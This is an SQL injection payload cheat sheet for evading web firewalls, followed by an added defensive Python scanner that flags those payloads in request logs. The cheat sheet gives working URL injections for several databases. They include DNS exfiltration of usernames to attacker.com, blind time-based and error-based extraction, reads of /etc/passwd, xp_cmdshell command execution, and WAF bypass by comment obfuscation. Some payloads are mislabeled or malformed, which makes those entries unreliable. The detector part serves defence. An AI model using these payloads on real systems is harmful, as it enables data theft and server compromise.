Advanced SQL Injection Techniques to Bypass Security Firewalls
1. Out-of-Band (OOB) SQL Injection
# OOB via DNS Exfiltration
http://example.com/page.php?id=1'; SELECT load_file(concat('\\\\', (SELECT username FROM users LIMIT 1), '.attacker.com\\')) --
# OOB via HTTP Requests
http://example.com/page.php?id=1'; SELECT pg_sleep(10) --
2. Time-based Blind SQL Injection
# Time-based Blind SQL Injection
http://example.com/page.php?id=1' AND IF(SUBSTRING(database(), 1, 1) = 'm', sleep(10), 0) --
# Time-based Blind SQL Injection (MSSQL)
http://example.com/page.php?id=1'; IF(SUBSTRING((SELECT @@version), 25, 1) = '1', WAITFOR DELAY '0:0:10', 0) --
# Time-based Blind SQL Injection (Oracle)
http://example.com/page.php?id=1' AND dbms_pipe.receive_message(('a'),10) --
3. Advanced Error-based SQL Injection
# Advanced Error-based SQL Injection (MySQL)
http://example.com/page.php?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT (SELECT CONCAT(0x7e,0x27,unhex(hex(version())))))) FROM information_schema.tables LIMIT 0,1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) --
# Advanced Error-based SQL Injection (PostgreSQL)
http://example.com/page.php?id=1' UNION SELECT CASE WHEN (SELECT current_database())='postgres' THEN pg_sleep(10) ELSE pg_sleep(0) END; --
4. Bypassing WAF and IDS
# Bypassing Web Application Firewalls (WAF)
http://example.com/page.php?id=1'/**/OR/**/1=1# -- -%20
# Bypassing Intrusion Detection Systems (IDS)
http://example.com/page.php?id=-1' UNION SELECT 1,2,3,4 -- #
5. Second-Order SQL Injection
# Second-Order SQL Injection Example
1. Inject SQL: http://example.com/page.php?id=1; INSERT INTO logs (data) VALUES ('SQL Injection');
2. Later, when the application reads the stored data back and uses it in another query, the payload is triggered.
6. File-based SQL Injection
# File-based SQL Injection (MySQL)
http://example.com/page.php?id=-1' UNION SELECT LOAD_FILE('/etc/passwd') --
# File-based SQL Injection (PostgreSQL)
http://example.com/page.php?id=-1' UNION SELECT NULL, pg_read_file('/etc/passwd'), NULL --
7. Exploiting Function and Procedure Calls
# Exploiting Function and Procedure Calls (MSSQL)
http://example.com/page.php?id=1'; EXEC master.dbo.xp_cmdshell 'ping attacker.com' --
# Exploiting Function and Procedure Calls (Oracle)
http://example.com/page.php?id=1'; EXEC DBMS_SCHEDULER.CREATE_JOB('PingJob','''BEGIN DBMS_SCHEDULER.RUN_JOB('PingJob'); END;'''); --
8. SQL Injection via HTTP Headers
# SQL Injection via HTTP Headers
GET /page.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://example.com/page.php?id=1' UNION SELECT 1,2,3,4 -- #
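A defender-side complement to the list above, added here and not part of the original cheat sheet: a small Python scanner that URL-decodes the request path and the headers section 8 shows being abused, and flags the traces these payloads leave (comment terminators, sleep/WAITFOR/dbms_pipe delays, FLOOR(RAND()) error tricks, LOAD_FILE/pg_read_file, xp_cmdshell, the UNC path of the DNS OOB payload, /**/ obfuscation). The JSON-lines log format, the rule names and the sample records are constructed for this example.

```python
import json
import re
from urllib.parse import unquote_plus
# One regex per technique from the cheat sheet; the key becomes the alert label. Constructed rule set.
RULES = {
    "comment-terminator": r"(--\s|#\s*$|/\*.*?\*/)",
    "inline-comment-obfuscation": r"/\*\*/",
    "time-based": r"\b(sleep|pg_sleep|waitfor\s+delay|dbms_pipe\.receive_message)\b",
    "error-based": r"\bfloor\s*\(\s*rand\s*\(",
    "file-read": r"\b(load_file|pg_read_file)\s*\(",
    "oob-unc-path": r"(\\\\){2,}",  # 4+ backslashes: UNC path inside a MySQL string literal
    "command-exec": r"\b(xp_cmdshell|dbms_scheduler\.create_job)\b",
    "union-select": r"\bunion\s+(all\s+)?select\b",
}
COMPILED = {name: re.compile(pat, re.I | re.S) for name, pat in RULES.items()}
# Section 8 shows headers used as the injection point, so they are scanned like the path.
FIELDS = ("path", "Referer", "User-Agent")

def scan_request(record: dict) -> dict:
    """Return {field: [technique, ...]} for each field of one request that matches a rule."""
    hits = {}
    for field in FIELDS:
        raw = record.get(field)
        if not raw:
            continue
        # Decode twice so double-encoded payloads are compared as the database would see them.
        text = unquote_plus(unquote_plus(raw))
        matched = [name for name, rx in COMPILED.items() if rx.search(text)]
        if matched:
            hits[field] = matched
    return hits

def scan_log(log_text: str) -> list:
    """One JSON record per line; return [(line_no, hits)] for every flagged request."""
    flagged = []
    for line_no, line in enumerate(log_text.strip().splitlines(), 1):
        hits = scan_request(json.loads(line))
        if hits:
            flagged.append((line_no, hits))
    return flagged

# Constructed sample log: one benign request, then requests carrying payloads from the page.
SAMPLE_LOG = r"""
{"path": "/page.php?id=1", "Referer": "http://example.com/"}
{"path": "/page.php?id=1%27%20AND%20IF(SUBSTRING(database(),1,1)=%27m%27,sleep(10),0)--%20"}
{"path": "/page.php?id=-1%27%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27)--%20"}
{"path": "/page.php", "Referer": "http://example.com/page.php?id=1' UNION SELECT 1,2,3,4 -- #"}
{"path": "/page.php?id=1%27/**/OR/**/1=1%23"}
{"path": "/page.php?id=1%27;%20SELECT%20load_file(concat(%27\\\\\\\\%27,(SELECT%20username%20FROM%20users%20LIMIT%201),%27.attacker.com\\\\%27))--%20"}
"""
```

`scan_log(SAMPLE_LOG)` leaves the benign first record alone and labels each of the others with the techniques it carries; the rules are deliberately broad (a bare `--` in a legitimate value will trip the first one), so treat matches as triage input rather than a block decision.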